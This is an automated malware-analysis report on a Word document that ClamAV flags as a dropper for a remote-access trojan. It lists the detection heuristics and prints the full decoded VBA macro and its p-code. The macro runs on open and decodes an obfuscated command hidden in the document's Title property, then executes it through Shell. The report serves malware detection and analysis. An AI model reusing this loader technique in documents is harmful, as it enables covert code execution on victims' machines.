MALICIOUS
250
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains a VBA macro that executes upon opening the document. This macro decodes a string from the document's title property, which appears to be a configuration string. It then uses this string to construct and execute a command via the Shell() function, likely to download and run a secondary payload. The ClamAV detection name 'Doc.Dropper.ImminentMonitorRAT' further suggests its role as a dropper for a Remote Access Trojan.
Heuristics 8
-
ClamAV: Doc.Dropper.ImminentMonitorRAT-10018167-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.ImminentMonitorRAT-10018167-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Rw = StrConv(zs, vbUnicode) Shell (Replace(Replace(Split(Rw, Chr(124))(1), Split(Rw, Chr(124))(0), Chr(46)), "FP" + "ATH", ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name)), 0 End Sub -
VBA reads reversed config from document properties high OLE_VBA_REVERSED_DOCPROP_CONFIGVBA applies StrReverse to values read from the document's custom/built-in properties. Storing reversed configuration (URLs, CLSIDs, env-var names, payload names) in document properties keeps indicators out of the macro source — an obfuscation technique used by the SVCReady loader.Matched line in script
Dim fT As String fT = StrReverse(ThisDocument.BuiltInDocumentProperties("T" + "it" + "le")) zs = StrConv(fT, vbFromUnicode) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() Dim zs() As Byte -
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x61 bytes
Disassembly
Attempted x86 opcode disassembly00019708 61 popal 00019709 61 popal 0001970A 61 popal 0001970B 61 popal 0001970C 61 popal 0001970D 61 popal 0001970E 61 popal 0001970F 61 popal 00019710 61 popal 00019711 61 popal 00019712 61 popal 00019713 61 popal 00019714 61 popal 00019715 61 popal 00019716 61 popal 00019717 61 popal 00019718 61 popal 00019719 61 popal 0001971A 61 popal 0001971B 61 popal 0001971C 61 popal 0001971D 61 popal 0001971E 61 popal 0001971F 61 popal 00019720 61 popal 00019721 61 popal 00019722 61 popal 00019723 61 popal 00019724 61 popal 00019725 61 popal 00019726 61 popal 00019727 61 popal 00019728 61 popal 00019729 61 popal 0001972A 61 popal 0001972B 61 popal 0001972C 61 popal 0001972D 61 popal 0001972E 61 popal 0001972F 61 popal 00019730 61 popal 00019731 61 popal 00019732 61 popal 00019733 61 popal 00019734 61 popal 00019735 61 popal 00019736 61 popal 00019737 61 popal 00019738 61 popal 00019739 61 popal 0001973A 61 popal 0001973B 61 popal 0001973C 61 popal 0001973D 61 popal 0001973E 61 popal 0001973F 61 popal 00019740 61 popal 00019741 61 popal 00019742 61 popal 00019743 61 popal 00019744 61 popal 00019745 61 popal 00019746 61 popal 00019747 61 popal 00019748 61 popal 00019749 61 popal 0001974A 61 popal 0001974B 61 popal 0001974C 61 popal 0001974D 61 popal 0001974E 61 popal 0001974F 61 popal 00019750 61 popal 00019751 61 popal 00019752 61 popal 00019753 61 popal 00019754 61 popal 00019755 61 popal 00019756 61 popal 00019757 61 popal 00019758 61 popal 00019759 61 popal 0001975A 61 popal 0001975B 61 popal 0001975C 61 popal 0001975D 61 popal 0001975E 61 popal 0001975F 61 popal 00019760 61 popal 00019761 61 popal 00019762 61 popal 00019763 61 popal 00019764 61 popal 00019765 61 popal 00019766 61 popal 00019767 61 popal
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2517 bytes |
SHA-256: 62873350e7fa853024fe1a1ef31f70b4783e19f4ab0244cd27ac2ac236bc66d5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim zs() As Byte
Dim Rw, Og As String
Dim rp As Long
Dim fT As String
fT = StrReverse(ThisDocument.BuiltInDocumentProperties("T" + "it" + "le"))
zs = StrConv(fT, vbFromUnicode)
For rp = 0 To UBound(zs)
zs(rp) = zs(rp) - 7
Next rp
Rw = StrConv(zs, vbUnicode)
Shell (Replace(Replace(Split(Rw, Chr(124))(1), Split(Rw, Chr(124))(0), Chr(46)), "FP" + "ATH", ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name)), 0
End Sub
' Processing file: /tmp/qstore_7j4g88ze
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3960 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' Dim
' VarDefn GY (As Byte)
' Line #2:
' Dim
' VarDefn zs
' VarDefn Rw (As String)
' Line #3:
' Dim
' VarDefn Og (As Long)
' Line #4:
' Dim
' VarDefn rp (As String)
' Line #5:
' LitStr 0x0001 "T"
' LitStr 0x0002 "it"
' Add
' LitStr 0x0002 "le"
' Add
' Ld ThisDocument
' ArgsMemLd BuiltInDocumentProperties 0x0001
' ArgsLd StrReverse 0x0001
' St rp
' Line #6:
' Ld rp
' Ld vbFromUnicode
' ArgsLd StrConv 0x0002
' St GY
' Line #7:
' StartForVariable
' Ld Og
' EndForVariable
' LitDI2 0x0000
' Ld GY
' FnUBound 0x0000
' For
' Line #8:
' Ld Og
' ArgsLd GY 0x0001
' LitDI2 0x0007
' Sub
' Ld Og
' ArgsSt GY 0x0001
' Line #9:
' StartForVariable
' Ld Og
' EndForVariable
' NextVar
' Line #10:
' Ld GY
' Ld vbUnicode
' ArgsLd StrConv 0x0002
' St zs
' Line #11:
' LitDI2 0x0001
' Ld zs
' LitDI2 0x007C
' ArgsLd Chr 0x0001
' ArgsLd Split 0x0002
' IndexLd 0x0001
' LitDI2 0x0000
' Ld zs
' LitDI2 0x007C
' ArgsLd Chr 0x0001
' ArgsLd Split 0x0002
' IndexLd 0x0001
' LitDI2 0x002E
' ArgsLd Chr 0x0001
' ArgsLd Replace 0x0003
' LitStr 0x0002 "FP"
' LitStr 0x0003 "ATH"
' Add
' Ld ActiveDocument
' MemLd Path
' Ld Application
' MemLd PathSeparator
' Concat
' Ld ActiveDocument
' MemLd Name
' Concat
' ArgsLd Replace 0x0003
' Paren
' LitDI2 0x0000
' ArgsCall Shell 0x0002
' Line #12:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.